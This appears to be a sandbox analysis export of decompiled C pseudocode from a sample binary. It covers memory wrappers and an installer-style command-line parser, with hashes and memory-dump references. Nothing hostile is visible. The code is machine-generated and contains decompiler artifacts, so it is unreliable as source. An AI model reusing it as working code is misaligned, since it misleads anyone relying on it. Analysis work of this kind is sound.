                                                                                                                                                                                                                                            • Opcode ID: 834417ffd6525188688ea2ae6dda068b8c3ef242674accaecba9e5d26fad080e
                                                                                                                                                                                                                                            • Instruction ID: bfeabb89283b6c297189877ecd2c07c7550803149c0ab08b11cf6e63ad53e414
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 834417ffd6525188688ea2ae6dda068b8c3ef242674accaecba9e5d26fad080e
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 61B09276726440426E2447756C295562981AAD123A7E41B92F132C01E0CE3EC856D044
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A94CA0(long _a4) {
                                                                                                                                                                                                                                            				void* _t2;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                                                            				return _t2;
                                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                                            0x00a94caa
                                                                                                                                                                                                                                            0x00a94cb1

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GlobalAlloc.KERNELBASE(00000000,?), ref: 00A94CAA
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocGlobal
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3761449716-0
                                                                                                                                                                                                                                            • Opcode ID: b8a24ac996e79dcd53a972b50cbc5519acf05a227e24810147512d053866c831
                                                                                                                                                                                                                                            • Instruction ID: d253eca198073c457fb0d2a258c916e7be4b53d557c0d4da7e4801c865e70d32
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b8a24ac996e79dcd53a972b50cbc5519acf05a227e24810147512d053866c831
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 11B0123214420CB7CF001FC6EC09F853F1DE7C4761F140002F60C494508E73942186D6
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00A94CC0(void* _a4) {
                                                                                                                                                                                                                                            				void* _t2;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                                                            				return _t2;
                                                                                                                                                                                                                                            			}




                                                                                                                                                                                                                                            0x00a94cc8
                                                                                                                                                                                                                                            0x00a94ccf

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000002.00000002.408348267.0000000000A91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408340639.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408358969.0000000000A98000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            • Associated: 00000002.00000002.408367374.0000000000A9C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_2_2_a90000_faC80kI.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FreeGlobal
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2979337801-0
                                                                                                                                                                                                                                            • Opcode ID: f6cd5e18bcaf910a2e124c54629a74946686fb9f18db4a15ef79c46045144a35
                                                                                                                                                                                                                                            • Instruction ID: eafdc185d21a0f7425aa8a149d23bc41e0a53b1bc036dcd617b17517e00c319e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f6cd5e18bcaf910a2e124c54629a74946686fb9f18db4a15ef79c46045144a35
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 69B0123100010CB78F001B86EC088453F1DD6C02607000012F50C454218F33981285C5
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                                            			E00A95C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                            				CHAR* _v265;
                                                                                                                                                                                                                                            				char _v266;
                                                                                                                                                                                                                                            				char _v267;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				CHAR* _v272;
                                                                                                                                                                                                                                            				char _v276;
                                                                                                                                                                                                                                            				signed int _v296;
                                                                                                                                                                                                                                            				char _v556;
                                                                                                                                                                                                                                            				signed int _t61;
                                                                                                                                                                                                                                            				int _t63;
                                                                                                                                                                                                                                            				char _t67;
                                                                                                                                                                                                                                            				CHAR* _t69;
                                                                                                                                                                                                                                            				signed int _t71;
                                                                                                                                                                                                                                            				void* _t75;
                                                                                                                                                                                                                                            				char _t79;
                                                                                                                                                                                                                                            				void* _t83;
                                                                                                                                                                                                                                            				void* _t85;
                                                                                                                                                                                                                                            				void* _t87;
                                                                                                                                                                                                                                            				intOrPtr _t88;
                                                                                                                                                                                                                                            				void* _t100;
                                                                                                                                                                                                                                            				intOrPtr _t101;
                                                                                                                                                                                                                                            				CHAR* _t104;
                                                                                                                                                                                                                                            				intOrPtr _t105;
                                                                                                                                                                                                                                            				void* _t111;
                                                                                                                                                                                                                                            				void* _t115;
                                                                                                                                                                                                                                            				CHAR* _t118;
                                                                                                                                                                                                                                            				void* _t119;
                                                                                                                                                                                                                                            				void* _t127;
                                                                                                                                                                                                                                            				CHAR* _t129;
                                                                                                                                                                                                                                            				void* _t132;
                                                                                                                                                                                                                                            				void* _t142;
                                                                                                                                                                                                                                            				signed int _t143;
                                                                                                                                                                                                                                            				CHAR* _t144;
                                                                                                                                                                                                                                            				void* _t145;
                                                                                                                                                                                                                                            				void* _t146;
                                                                                                                                                                                                                                            				void* _t147;
                                                                                                                                                                                                                                            				void* _t149;
                                                                                                                                                                                                                                            				char _t155;
                                                                                                                                                                                                                                            				void* _t157;
                                                                                                                                                                                                                                            				void* _t162;
                                                                                                                                                                                                                                            				void* _t163;
                                                                                                                                                                                                                                            				char _t167;
                                                                                                                                                                                                                                            				char _t170;
                                                                                                                                                                                                                                            				CHAR* _t173;
                                                                                                                                                                                                                                            				void* _t177;
                                                                                                                                                                                                                                            				intOrPtr* _t183;
                                                                                                                                                                                                                                            				intOrPtr* _t192;
                                                                                                                                                                                                                                            				CHAR* _t199;
                                                                                                                                                                                                                                            				void* _t200;
                                                                                                                                                                                                                                            				CHAR* _t201;
                                                                                                                                                                                                                                            				void* _t205;
                                                                                                                                                                                                                                            				void* _t206;
                                                                                                                                                                                                                                            				int _t209;
                                                                                                                                                                                                                                            				void* _t210;
                                                                                                                                                                                                                                            				void* _t212;
                                                                                                                                                                                                                                            				void* _t213;
                                                                                                                                                                                                                                            				CHAR* _t218;
                                                                                                                                                                                                                                            				intOrPtr* _t219;
                                                                                                                                                                                                                                            				intOrPtr* _t220;
                                                                                                                                                                                                                                            				signed int _t221;
                                                                                                                                                                                                                                            				signed int _t223;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t173 = __ecx;
                                                                                                                                                                                                                                            				_t61 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                                                            				_push(__ebx);
                                                                                                                                                                                                                                            				_push(__esi);
                                                                                                                                                                                                                                            				_push(__edi);
                                                                                                                                                                                                                                            				_t209 = 1;
                                                                                                                                                                                                                                            				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                                                            					_t63 = 1;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					L2:
                                                                                                                                                                                                                                            					while(_t209 != 0) {
                                                                                                                                                                                                                                            						_t67 =  *_t173;
                                                                                                                                                                                                                                            						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                                                            							_t173 = CharNextA(_t173);
                                                                                                                                                                                                                                            							continue;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_v272 = _t173;
                                                                                                                                                                                                                                            						if(_t67 == 0) {
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t69 = _v272;
                                                                                                                                                                                                                                            							_t177 = 0;
                                                                                                                                                                                                                                            							_t213 = 0;
                                                                                                                                                                                                                                            							_t163 = 0;
                                                                                                                                                                                                                                            							_t202 = 1;
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								if(_t213 != 0) {
                                                                                                                                                                                                                                            									if(_t163 != 0) {
                                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										goto L21;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									_t69 =  *_t69;
                                                                                                                                                                                                                                            									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t69 = _v272;
                                                                                                                                                                                                                                            										L21:
                                                                                                                                                                                                                                            										_t155 =  *_t69;
                                                                                                                                                                                                                                            										if(_t155 != 0x22) {
                                                                                                                                                                                                                                            											if(_t202 >= 0x104) {
                                                                                                                                                                                                                                            												goto L106;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                                                            												_t177 = _t177 + 1;
                                                                                                                                                                                                                                            												_t202 = _t202 + 1;
                                                                                                                                                                                                                                            												_t157 = 1;
                                                                                                                                                                                                                                            												goto L30;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											if(_v272[1] == 0x22) {
                                                                                                                                                                                                                                            												if(_t202 >= 0x104) {
                                                                                                                                                                                                                                            													L106:
                                                                                                                                                                                                                                            													_t63 = 0;
                                                                                                                                                                                                                                            													L125:
                                                                                                                                                                                                                                            													_pop(_t210);
                                                                                                                                                                                                                                            													_pop(_t212);
                                                                                                                                                                                                                                            													_pop(_t162);
                                                                                                                                                                                                                                            													return E00A96CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                                                            													_t177 = _t177 + 1;
                                                                                                                                                                                                                                            													_t202 = _t202 + 1;
                                                                                                                                                                                                                                            													_t157 = 2;
                                                                                                                                                                                                                                            													goto L30;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t157 = 1;
                                                                                                                                                                                                                                            												if(_t213 != 0) {
                                                                                                                                                                                                                                            													_t163 = 1;
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													_t213 = 1;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												goto L30;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								goto L131;
                                                                                                                                                                                                                                            								L30:
                                                                                                                                                                                                                                            								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                                                            								_t69 = _v272;
                                                                                                                                                                                                                                            							} while ( *_t69 != 0);
                                                                                                                                                                                                                                            							if(_t177 >= 0x104) {
                                                                                                                                                                                                                                            								E00A96E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                                                            								asm("int3");
                                                                                                                                                                                                                                            								_push(_t221);
                                                                                                                                                                                                                                            								_t222 = _t223;
                                                                                                                                                                                                                                            								_t71 =  *0xa98004; // 0x306ebedf
                                                                                                                                                                                                                                            								_v296 = _t71 ^ _t223;
                                                                                                                                                                                                                                            								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                                                                                                                                                                                            									0x4f0 = 2;
                                                                                                                                                                                                                                            									_t75 = E00A9597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E00A944B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                                                            									 *0xa99124 = E00A96285();
                                                                                                                                                                                                                                            									_t75 = 0;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								return E00A96CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                                                            								if(_t213 == 0) {
                                                                                                                                                                                                                                            									if(_t163 != 0) {
                                                                                                                                                                                                                                            										goto L34;
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										goto L40;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									if(_t163 != 0) {
                                                                                                                                                                                                                                            										L40:
                                                                                                                                                                                                                                            										_t79 = _v268;
                                                                                                                                                                                                                                            										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                                                            											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                                                            											if(_t83 == 0) {
                                                                                                                                                                                                                                            												_t202 = 0x521;
                                                                                                                                                                                                                                            												E00A944B9(0, 0x521, 0xa91140, 0, 0x40, 0);
                                                                                                                                                                                                                                            												_t85 =  *0xa98588; // 0x0
                                                                                                                                                                                                                                            												if(_t85 != 0) {
                                                                                                                                                                                                                                            													CloseHandle(_t85);
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												ExitProcess(0);
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            											_t87 = _t83 - 4;
                                                                                                                                                                                                                                            											if(_t87 == 0) {
                                                                                                                                                                                                                                            												if(_v266 != 0) {
                                                                                                                                                                                                                                            													if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            														goto L49;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                                                            														_t215 =  &_v268 + _t167;
                                                                                                                                                                                                                                            														_t183 =  &_v268 + _t167;
                                                                                                                                                                                                                                            														_t50 = _t183 + 1; // 0x1
                                                                                                                                                                                                                                            														_t202 = _t50;
                                                                                                                                                                                                                                            														do {
                                                                                                                                                                                                                                            															_t88 =  *_t183;
                                                                                                                                                                                                                                            															_t183 = _t183 + 1;
                                                                                                                                                                                                                                            														} while (_t88 != 0);
                                                                                                                                                                                                                                            														if(_t183 == _t202) {
                                                                                                                                                                                                                                            															goto L49;
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															_t205 = 0x5b;
                                                                                                                                                                                                                                            															if(E00A9667F(_t215, _t205) == 0) {
                                                                                                                                                                                                                                            																L115:
                                                                                                                                                                                                                                            																_t206 = 0x5d;
                                                                                                                                                                                                                                            																if(E00A9667F(_t215, _t206) == 0) {
                                                                                                                                                                                                                                            																	L117:
                                                                                                                                                                                                                                            																	_t202 =  &_v276;
                                                                                                                                                                                                                                            																	_v276 = _t167;
                                                                                                                                                                                                                                            																	if(E00A95C17(_t215,  &_v276) == 0) {
                                                                                                                                                                                                                                            																		goto L49;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		_t202 = 0x104;
                                                                                                                                                                                                                                            																		E00A91680(0xa98c42, 0x104, _v276 + _t167 +  &_v268);
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	_t202 = 0x5b;
                                                                                                                                                                                                                                            																	if(E00A9667F(_t215, _t202) == 0) {
                                                                                                                                                                                                                                            																		goto L49;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		goto L117;
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																_t202 = 0x5d;
                                                                                                                                                                                                                                            																if(E00A9667F(_t215, _t202) == 0) {
                                                                                                                                                                                                                                            																	goto L49;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	goto L115;
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													 *0xa98a24 = 1;
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            												goto L50;
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												_t100 = _t87 - 1;
                                                                                                                                                                                                                                            												if(_t100 == 0) {
                                                                                                                                                                                                                                            													L98:
                                                                                                                                                                                                                                            													if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            														goto L49;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														_t170 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                                                            														_t217 =  &_v268 + _t170;
                                                                                                                                                                                                                                            														_t192 =  &_v268 + _t170;
                                                                                                                                                                                                                                            														_t38 = _t192 + 1; // 0x1
                                                                                                                                                                                                                                            														_t202 = _t38;
                                                                                                                                                                                                                                            														do {
                                                                                                                                                                                                                                            															_t101 =  *_t192;
                                                                                                                                                                                                                                            															_t192 = _t192 + 1;
                                                                                                                                                                                                                                            														} while (_t101 != 0);
                                                                                                                                                                                                                                            														if(_t192 == _t202) {
                                                                                                                                                                                                                                            															goto L49;
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															_t202 =  &_v276;
                                                                                                                                                                                                                                            															_v276 = _t170;
                                                                                                                                                                                                                                            															if(E00A95C17(_t217,  &_v276) == 0) {
                                                                                                                                                                                                                                            																goto L49;
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																_t104 = CharUpperA(_v267);
                                                                                                                                                                                                                                            																_t218 = 0xa98b3e;
                                                                                                                                                                                                                                            																_t105 = _v276;
                                                                                                                                                                                                                                            																if(_t104 != 0x54) {
                                                                                                                                                                                                                                            																	_t218 = 0xa98a3a;
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            																E00A91680(_t218, 0x104, _t105 + _t170 +  &_v268);
                                                                                                                                                                                                                                            																_t202 = 0x104;
                                                                                                                                                                                                                                            																E00A9658A(_t218, 0x104, 0xa91140);
                                                                                                                                                                                                                                            																if(E00A931E0(_t218) != 0) {
                                                                                                                                                                                                                                            																	goto L50;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	goto L106;
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												} else {
                                                                                                                                                                                                                                            													_t111 = _t100 - 0xa;
                                                                                                                                                                                                                                            													if(_t111 == 0) {
                                                                                                                                                                                                                                            														if(_v266 != 0) {
                                                                                                                                                                                                                                            															if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            																goto L49;
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																_t199 = _v265;
                                                                                                                                                                                                                                            																if(_t199 != 0) {
                                                                                                                                                                                                                                            																	_t219 =  &_v265;
                                                                                                                                                                                                                                            																	do {
                                                                                                                                                                                                                                            																		_t219 = _t219 + 1;
                                                                                                                                                                                                                                            																		_t115 = CharUpperA(_t199) - 0x45;
                                                                                                                                                                                                                                            																		if(_t115 == 0) {
                                                                                                                                                                                                                                            																			 *0xa98a2c = 1;
                                                                                                                                                                                                                                            																		} else {
                                                                                                                                                                                                                                            																			_t200 = 2;
                                                                                                                                                                                                                                            																			_t119 = _t115 - _t200;
                                                                                                                                                                                                                                            																			if(_t119 == 0) {
                                                                                                                                                                                                                                            																				 *0xa98a30 = 1;
                                                                                                                                                                                                                                            																			} else {
                                                                                                                                                                                                                                            																				if(_t119 == 0xf) {
                                                                                                                                                                                                                                            																					 *0xa98a34 = 1;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t209 = 0;
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																			}
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																		_t118 =  *_t219;
                                                                                                                                                                                                                                            																		_t199 = _t118;
                                                                                                                                                                                                                                            																	} while (_t118 != 0);
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															 *0xa98a2c = 1;
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            														goto L50;
                                                                                                                                                                                                                                            													} else {
                                                                                                                                                                                                                                            														_t127 = _t111 - 3;
                                                                                                                                                                                                                                            														if(_t127 == 0) {
                                                                                                                                                                                                                                            															if(_v266 != 0) {
                                                                                                                                                                                                                                            																if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            																	goto L49;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	_t129 = CharUpperA(_v265);
                                                                                                                                                                                                                                            																	if(_t129 == 0x31) {
                                                                                                                                                                                                                                            																		goto L76;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		if(_t129 == 0x41) {
                                                                                                                                                                                                                                            																			goto L83;
                                                                                                                                                                                                                                            																		} else {
                                                                                                                                                                                                                                            																			if(_t129 == 0x55) {
                                                                                                                                                                                                                                            																				goto L76;
                                                                                                                                                                                                                                            																			} else {
                                                                                                                                                                                                                                            																				goto L49;
                                                                                                                                                                                                                                            																			}
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																L76:
                                                                                                                                                                                                                                            																_push(2);
                                                                                                                                                                                                                                            																_pop(1);
                                                                                                                                                                                                                                            																L83:
                                                                                                                                                                                                                                            																 *0xa98a38 = 1;
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            															goto L50;
                                                                                                                                                                                                                                            														} else {
                                                                                                                                                                                                                                            															_t132 = _t127 - 1;
                                                                                                                                                                                                                                            															if(_t132 == 0) {
                                                                                                                                                                                                                                            																if(_v266 != 0) {
                                                                                                                                                                                                                                            																	if(_v266 != 0x3a) {
                                                                                                                                                                                                                                            																		if(CompareStringA(0x7f, 1, "RegServer", 0xffffffff,  &_v267, 0xffffffff) != 0) {
                                                                                                                                                                                                                                            																			goto L49;
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		_t201 = _v265;
                                                                                                                                                                                                                                            																		 *0xa99a2c = 1;
                                                                                                                                                                                                                                            																		if(_t201 != 0) {
                                                                                                                                                                                                                                            																			_t220 =  &_v265;
                                                                                                                                                                                                                                            																			do {
                                                                                                                                                                                                                                            																				_t220 = _t220 + 1;
                                                                                                                                                                                                                                            																				_t142 = CharUpperA(_t201) - 0x41;
                                                                                                                                                                                                                                            																				if(_t142 == 0) {
                                                                                                                                                                                                                                            																					_t143 = 2;
                                                                                                                                                                                                                                            																					 *0xa99a2c =  *0xa99a2c | _t143;
                                                                                                                                                                                                                                            																					goto L70;
                                                                                                                                                                                                                                            																				} else {
                                                                                                                                                                                                                                            																					_t145 = _t142 - 3;
                                                                                                                                                                                                                                            																					if(_t145 == 0) {
                                                                                                                                                                                                                                            																						 *0xa98d48 =  *0xa98d48 | 0x00000040;
                                                                                                                                                                                                                                            																					} else {
                                                                                                                                                                                                                                            																						_t146 = _t145 - 5;
                                                                                                                                                                                                                                            																						if(_t146 == 0) {
                                                                                                                                                                                                                                            																							 *0xa99a2c =  *0xa99a2c & 0xfffffffd;
                                                                                                                                                                                                                                            																							goto L70;
                                                                                                                                                                                                                                            																						} else {
                                                                                                                                                                                                                                            																							_t147 = _t146 - 5;
                                                                                                                                                                                                                                            																							if(_t147 == 0) {
                                                                                                                                                                                                                                            																								 *0xa99a2c =  *0xa99a2c & 0xfffffffe;
                                                                                                                                                                                                                                            																								goto L70;
                                                                                                                                                                                                                                            																							} else {
                                                                                                                                                                                                                                            																								_t149 = _t147;
                                                                                                                                                                                                                                            																								if(_t149 == 0) {
                                                                                                                                                                                                                                            																									 *0xa98d48 =  *0xa98d48 | 0x00000080;
                                                                                                                                                                                                                                            																								} else {
                                                                                                                                                                                                                                            																									if(_t149 == 3) {
                                                                                                                                                                                                                                            																										 *0xa99a2c =  *0xa99a2c | 0x00000004;
                                                                                                                                                                                                                                            																										L70:
                                                                                                                                                                                                                                            																										 *0xa98a28 = 1;
                                                                                                                                                                                                                                            																									} else {
                                                                                                                                                                                                                                            																										_t209 = 0;
                                                                                                                                                                                                                                            																									}
                                                                                                                                                                                                                                            																								}
                                                                                                                                                                                                                                            																							}
                                                                                                                                                                                                                                            																						}
                                                                                                                                                                                                                                            																					}
                                                                                                                                                                                                                                            																				}
                                                                                                                                                                                                                                            																				_t144 =  *_t220;
                                                                                                                                                                                                                                            																				_t201 = _t144;
                                                                                                                                                                                                                                            																			} while (_t144 != 0);
                                                                                                                                                                                                                                            																		}
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	 *0xa99a2c = 3;
                                                                                                                                                                                                                                            																	 *0xa98a28 = 1;
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            																goto L50;
                                                                                                                                                                                                                                            															} else {
                                                                                                                                                                                                                                            																if(_t132 == 0) {
                                                                                                                                                                                                                                            																	goto L98;
                                                                                                                                                                                                                                            																} else {
                                                                                                                                                                                                                                            																	L49:
                                                                                                                                                                                                                                            																	_t209 = 0;
                                                                                                                                                                                                                                            																	L50:
                                                                                                                                                                                                                                            																	_t173 = _v272;
                                                                                                                                                                                                                                            																	if( *_t173 != 0) {
                                                                                                                                                                                                                                            																		goto L2;
                                                                                                                                                                                                                                            																	} else {
                                                                                                                                                                                                                                            																		break;
                                                                                                                                                                                                                                            																	}
                                                                                                                                                                                                                                            																}
                                                                                                                                                                                                                                            															}
                                                                                                                                                                                                                                            														}
                                                                                                                                                                                                                                            													}
                                                                                                                                                                                                                                            												}
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L106;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										L34:
                                                                                                                                                                                                                                            										_t209 = 0;
                                                                                                                                                                                                                                            										break;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L131;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if( *0xa98a2c != 0 &&  *0xa98b3e == 0) {
                                                                                                                                                                                                                                            						if(GetModuleFileNameA( *0xa99a3c, 0xa98b3e, 0x104) == 0) {
                                                                                                                                                                                                                                            							_t209 = 0;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t202 = 0x5c;
                                                                                                                                                                                                                                            							 *((char*)(E00A966C8(0xa98b3e, _t202) + 1)) = 0;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_t63 = _t209;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				L131:
                                                                                                                                                                                                                                            			}

                                                                                                                                                                                                                                            0x00a95d14
                                                                                                                                                                                                                                            0x00a95d15
                                                                                                                                                                                                                                            0x00a95d17
                                                                                                                                                                                                                                            0x00a95d49
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95d19
                                                                                                                                                                                                                                            0x00a95d19
                                                                                                                                                                                                                                            0x00a95d1d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95d3f
                                                                                                                                                                                                                                            0x00a95d3f
                                                                                                                                                                                                                                            0x00a95d4b
                                                                                                                                                                                                                                            0x00a95d4b
                                                                                                                                                                                                                                            0x00a95d4f
                                                                                                                                                                                                                                            0x00a95d8d
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a95d93
